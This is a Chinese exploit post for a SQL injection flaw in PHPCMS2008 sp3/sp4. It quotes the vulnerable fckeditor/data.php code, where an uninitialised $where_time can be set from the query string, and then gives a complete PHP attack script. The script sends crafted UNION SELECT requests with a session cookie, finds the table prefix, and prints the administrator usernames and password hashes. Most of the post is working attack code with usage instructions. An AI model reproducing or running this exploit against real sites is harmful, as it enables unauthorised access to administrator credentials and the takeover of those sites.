PHPCMS2008 sp3、sp4 SQL注入漏洞 & exp

...

switch($action)

{

case '':

if($data == '') exit;

if(CHARSET != 'utf-8') $data = iconv('utf-8', CHARSET, $data);

$db->query("INSERT INTO ".DB_PRE."editor_data SET userid='$_userid', editorid='$editorid', ip='".IP."', created_time='".TIME."', data='$data'");

echo 'ok';

break;



case 'get':

$hour = intval($hour);

if($hour>1)

{

$hour_start = TIME - $hour*3600;

$hour_end = TIME - ($hour-1)*3600;

$where_time = " created_time>=$hour_start AND created_time<=$hour_end";

}

elseif($hour==1)

{

$hour_end = TIME - 3600;

$where_time = "created_time>=$hour_end";

}

$data = array();

$result = $db->query("SELECT `created_time`,`id` FROM ".DB_PRE."editor_data WHERE userid=$_userid AND editorid='$editorid' AND $where_time ORDER BY id DESC");//正常情况下$where_time未初始化，可以通过全局用get赋值

while($r = $db->fetch_array($result))

{

$r['created_time'] = date('Y-m-d H:i:s', $r['created_time']);

$data[] = $r;

}

$db->free_result($result);

echo json_encode($data);

break;

...

<?php



print_r('

--------------------------------------------------------------------------------

PhpCms2008 sp3 "fckeditor/data.php" SQL injection

Admin credentials disclosure exploit

BY oldjun([url]www.oldjun.com[/url]) from ([url]www.t00ls.net[/url])

--------------------------------------------------------------------------------

');



if ($argc<3) {

print_r('

--------------------------------------------------------------------------------

Usage: php '.$argv[0].' host path

host: target server (ip/hostname),without"http://"

path: path to phpcms

Example:

php '.$argv[0].' localhost /

--------------------------------------------------------------------------------

');

die;

}



function sendpacketii($packet)

{

global  $host, $html;

$ock=fsockopen(gethostbyname($host),'80');

if (!$ock) {

echo 'No response from '.$host; die;

}

fputs($ock,$packet);

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

fclose($ock);

}



$host=$argv[1];

$path=$argv[2];

$prefix="phpcms_";



//Need to modify!!!

$cookie="GkvhDogqvGusername=oldjun; GkvhDogqvGauth=UzEPAQ5XAFFTAlBQVlxTBVEEDlVUUAANUQQGDwZaXFRRWw%3D%3D; GkvhDogqvGcookietime=0";

$agent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)";

//Remember to modify!!!



if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))

{echo 'Error... check the path!'; die;}



/*get   $prefix*/

$packet ="GET ".$path."fckeditor/data.php?action=get&where_time=/**/union/**/select HTTP/1.1\r\n";

$packet.="User-Agent: ".$agent."\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Cookie: ".$cookie."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

if (eregi("in your SQL syntax",$html))

{

$temp=explode("From ",$html);

if(isset($temp[1])){$temp2=explode("product",$temp[1]);}

if($temp2[0])

$prefix=$temp2[0];

echo "[+]prefix -> ".$prefix."\r\n\r\n";

}else{

echo "Login first!Pls modify cookie and agent!";

die();        

}

echo "[~]exploting now,plz waiting\r\n\r\n";



$packet ="GET ".$path."fckeditor/data.php?action=get&where_time=1=2%20union%20all%20select%201,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20groupid=1%23 HTTP/1.1\r\n";

$packet.="User-Agent: ".$agent."\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Cookie: ".$cookie."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

if (!eregi("created_time",$html)){

        echo $packet."\r\n";

        echo $html."\r\n";

        die("Exploit failed...");

}else{

        $pattern="/(\[.*?\])/si";

        preg_match($pattern,$html,$pg);

        $html=str_replace("\\r\\n","",$pg[1]);

        //echo $html;

        $result=json_decode($html);

        $num=count($result);

        echo "[+]Admin number -> ".$num."\r\n";

        for($i=0;$i<$num;$i++){

                echo "[+]No.".$i."(username|password) -> ".$result[$i]->{"id"}."\r\n";

        }

        echo "\r\nExploit succeeded...\r\n";

}

?>